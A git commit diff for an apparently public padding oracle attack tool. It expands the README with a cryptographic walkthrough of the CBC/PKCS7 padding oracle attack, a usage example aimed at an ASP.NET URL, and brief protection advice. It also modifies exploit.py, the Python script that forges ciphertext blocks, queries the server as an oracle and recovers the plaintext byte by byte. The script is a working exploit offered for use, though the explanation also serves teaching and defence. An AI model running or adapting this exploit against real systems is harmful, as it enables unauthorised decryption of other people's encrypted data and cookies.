Update the readme with more cryptography

mpgn · mpgn · commit f9f8db2d3c45 · 2016-03-23T16:18:02.000+01:00
diff --git a/README.md b/README.md
@@ -1,8 +1,97 @@
 # Padding Oracle Attack
 
-An exploit for the [Padding Oracle Attack](http://en.wikipedia.org/wiki/Padding_oracle). Tested against ASP.NET, works like a charm. The CBC  mode must use [PKCS7](https://en.wikipedia.org/wiki/Padding_%28cryptography%29#PKCS7) for the padding block.
-This is an implementation of this great article [Padding Oracle Attack](https://not.burntout.org/blog/Padding_Oracle_Attack/). I advise you to read it if you want to understand the basic of the attack.
-This exploit allow block size of 8 or 16 this mean it can be use even if the cipher use AES or DES.
+An exploit for the [Padding Oracle Attack](https://en.wikipedia.org/wiki/Padding_oracle_attack). Tested against ASP.NET, works like a charm. The CBC  mode must use [PKCS7](https://en.wikipedia.org/wiki/Padding_%28cryptography%29#PKCS7) for the padding block.
+This is an implementation of this great article [Padding Oracle Attack](https://not.burntout.org/blog/Padding_Oracle_Attack/). Since the article is not very well formated and maybe unclear, I made an explanation in the readme. i advise you to read it if you want to understand the basics of the attack.
+This exploit allow block size of 8 or 16 this mean it can be use even if the cipher use AES or DES. You can find instructions to launch the attack [here](https://github.com/mpgn/Padding-Oracle-Attack#options).
+
+## Explanation
+
+I will explain in this part the cryptography behind the attack. To follow this you need to understand the [CBC mode cipher chainning](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher_Block_Chaining_.28CBC.29) or [video link](https://www.youtube.com/watch?v=0D7OwYp6ZEc.) and the operator ⊕. This attack is also a [chosen-ciphertext attack](https://en.wikipedia.org/wiki/Chosen-ciphertext_attack).
+
+Encryption | Decryption
+--- | --- 
+C<sub>i</sub> = E<sub>k</sub>(P<sub>i</sub> ⊕ C<sub>i-1</sub>), and C<sub>0</sub> = IV | P<sub>i</sub> = D<sub>k</sub>(C<sub>i</sub>) ⊕ C<sub>i-1</sub>, and C<sub>0</sub> = IV
+
+In CBC mode we also need a padding in the case the length of the plaintext doesn't fill all the block. For example we can have this plaintext and the following padding if the length of the block is 8 :
+
+`S|E|C|R|E|T| |M|E|S|S|A|G|E|02|02`
+
+You can notice the length of SECRET MESSAGE is 14 so we need to fill two blocks of CBC equal 16. There are two bytes left, this is where the padding step in. You can see the two last byte 0202. Another example, if the padding had a length of 5, it will be fill with 05|05|05|05|05. Of course there is different way to fill the padding but in our case like most of the case the standard is [PKCS7](https://en.wikipedia.org/wiki/Padding_%28cryptography%29#PKCS7) for the padding block.
+
+If the padding does not match the PKCS7 standard it will produce an error. Example :
+
+`S|E|C|R|E|T| |M|E|S|S|A|G|E|03|03`
+
+When the block will be deciphered there will be a verification to check if the padding is good or not :
+
+`S|E|C|R|E|T| |M|E|S|S|A|G|E|03|03` => Wrong padding <br>
+`S|E|C|R|E|T| |M|E|S|S|A|G|E|02|02` => Good padding
+
+Now imagine we can **know** when we have a bad padding and a good padding (the server send an "error padding" or "404 not found" when the padding is wrong etc). We will call this our [Oracle](http://security.stackexchange.com/questions/10617/what-is-a-cryptographic-oracle). The answers he will give us will be :
+
+* good padding
+* bad padding
+
+Now we know that, we can construct a block to retrieve one byte of the plaintext, don't forget this is a chosen-ciphertext attack.
+An attacker will intercept a cipher text and retrieve byte by byte the plaintext.
+
+* intercepted cipher : C<sub>0</sub> | C<sub>...</sub> | C<sub>i-1</sub> | C<sub>i</sub>
+* then build a block like this :
+
+C'<sub>i-1</sub> = C'<sub>i-1</sub> ⊕ 00000001 ⊕ 0000000X || C<sub>i</sub>
+
+Where X is a char between `chr(0-256)`. 
+
+* then he sends C'<sub>i-1</sub> || C<sub>i</sub> to the oracle. The oracle will decrypt like this :
+
+D<sub>k</sub>(C'<sub>i</sub>) ⊕ C'<sub>i-1</sub>  <br>
+= D<sub>k</sub>(C'<sub>i</sub>) ⊕ C'<sub>i-1</sub> ⊕ 00000001 ⊕ 0000000X <br>
+= P'<sub>i</sub> ⊕ 00000001 ⊕ 0000000X <br>
+
+Now there is two possibilities: a padding error or not :
+
+* if we have a padding error :
+
+```
+If P'i ⊕ 0000000Y == abcdefg5 then:
+    abcdefg0 ⊕ 00000001 = abcdefg5
+```
+This is a wrong padding, so we can deduce the byte Y is wrong.
+
+* The oracle didn't give us a padding error and we know the byte X is good :
+
+```
+If P'i ⊕ 0000000X == abcdefg0 then:
+    abcdefg0 ⊕ 00000001 = abcdefg1
+```
+
+<hr>
+
+**For the second byte :**
+
+
+C'<sub>i-1</sub> = C'<sub>i-1</sub> ⊕ 00000022 ⊕ 000000YX || C<sub>i</sub>
+
+And then : 
+
+D<sub>k</sub>(C'<sub>i</sub>) ⊕ C'<sub>i-1</sub> <br>
+= D<sub>k</sub>(C'<sub>i</sub>) ⊕ C'<sub>i-1</sub> ⊕ 00000022 ⊕ 000000YX <br>
+= P'<sub>i</sub> ⊕ 00000001 ⊕ 00000YX <br>
+
+* TThe oracle didn't give us a padding error and we know the byte X is good :
+
+```
+If P'i ⊕ 000000YX == abcdef00 then:
+    abcdef00 ⊕ 00000022 = abcdef22
+```
+
+etc etc for all the block. You can now launch the python script by reading the next section :)
+
+
+### Protection 
+
+* Encrypt and MAC your data : http://security.stackexchange.com/questions/38942/how-to-protect-against-padding-oracle-attacks
+* Don't give error message like "Padding error", "MAC error", "decryption failed" etc
 
 ## Options
 
@@ -35,14 +124,16 @@ Example:
 python exploit.py -c E3B3D1120F999F4CEF945BA8B9326D7C3C8A8B02178E59AF506666542AB5EF44 -l 16 --host host.com -u /index.aspx?c= -v --error "Padding Error"
 ```
 
+<a href="https://asciinema.org/a/40222" target="_blank"><img src="https://asciinema.org/a/40222.png" height="350" width="550" ></a>
+
 ## Customisation
 
 > I wan to custom the Oracle !
 
 No problem, find these line and do what you have to do :)
 
 * Custom oracle response: 
-```
+```python
 ####################################
 # CUSTOM YOUR RESPONSE ORACLE HERE #
 ####################################
@@ -63,7 +154,7 @@ def test_validity(response,error):
 ```
 
 * Custom oracle call (HTTP)
-```
+```python
 ################################
 # CUSTOM YOUR ORACLE HTTP HERE #
 ################################
diff --git a/exploit.py b/exploit.py
@@ -2,6 +2,7 @@
 
 '''
     Padding Oracle Attack implementation of this article https://not.burntout.org/blog/Padding_Oracle_Attack/
+    Check the readme for a full cryptographic explanation
     Author: mpgn <martial.puygrenier@gmail.com>
     Date: 2016
 '''
@@ -11,7 +12,6 @@
 import re
 import binascii
 import sys
-import logging
 import time
 from binascii import unhexlify, hexlify
 from itertools import cycle, izip
@@ -88,7 +88,7 @@ def run(cipher,size_block,host,url,cookie,method,post,iv,error):
         if len(cipher_block[block]) != len_block:
             print "[-] Abort length block doesn't match the size_block"
             break
-        print "[+] Search value block : ", block
+        print "[+] Search value block : ", block, "\n"
         #for each byte of the block
         for i in range(0,size_block):
             # test each byte max 255
@@ -99,40 +99,57 @@ def run(cipher,size_block,host,url,cookie,method,post,iv,error):
                     bk = block_search_byte(size_block, i, ct_pos, valide_value) 
                     bp = cipher_block[block-1]
                     bc = block_padding(size_block, i) 
-                    if args.verbose == True:
-                        print "[+] Block M_Byte : %s"% bk
-                        print "[+] Block C_{i-1}: %s"% bp
-                        print "[+] Block Padding: %s"% bc
 
                     tmp = hex_xor(bk,bp)
                     cb  = hex_xor(tmp,bc).upper()
 
                     up_cipher  = cb + cipher_block[block]
-                    print "[+] Test [Byte ",''.join('%02i'% ct_pos),"/256 - Block",block,"]: ", up_cipher
-                    if args.verbose == True:
-                        print ''
                     #time.sleep(0.5)
 
                     # we call the oracle, our god
                     connection, response = call_oracle(host,cookie,url,post,method,up_cipher)
+
                     if args.verbose == True:
-                        print "[+] HTTP ", response.status, response.reason
-                    
+                        exe = re.findall('..',cb)
+                        discover = ('').join(exe[size_block-i:size_block])
+                        current =  ('').join(exe[size_block-i-1:size_block-i])
+                        find_me =  ('').join(exe[:-i-1])
+
+                        sys.stdout.write("\r[+] Test [Byte %03i/256 - Block %d ]: \033[31m%s\033[33m%s\033[36m%s\033[0m" % (ct_pos, block, find_me, current, discover))
+                        sys.stdout.flush()
+
                     if test_validity(response,error):
+
                         found = True
                         connection.close()
                         
-                        # data analyse
+                        # data analyse and insert in rigth order
                         value = re.findall('..',bk)
                         valide_value.insert(0,value[size_block-(i+1)])
-                        print "[+] Found", i+1,  "bytes :", ''.join(valide_value)
+
+                        if args.verbose == True:
+                            print ''
+                            print "[+] Block M_Byte : %s"% bk
+                            print "[+] Block C_{i-1}: %s"% bp
+                            print "[+] Block Padding: %s"% bc
+                            print ''
+
+                        bytes_found = ''.join(valide_value)
+                        if i == 0 and bytes_found.decode("hex") > hex(size_block):
+                            print "[-] Error decryption failed the padding is > 16"
+                            sys.exit()
+
+                        print '\033[36m' + '\033[1m' + "[+]" + '\033[0m' + " Found", i+1,  "bytes :", bytes_found
                         print ''
 
-                        # change byte of the block
-                        #sys.exit()
                         break 
             if found == False:
                 print "[-] Error decryption failed"
+                result.insert(0, ''.join(valide_value))
+                hex_r = ''.join(result)
+                print "[+] Partial Decrypted value (HEX):", hex_r.upper()
+                padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
+                print "[+] Partial Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
                 sys.exit()
             found = False
 
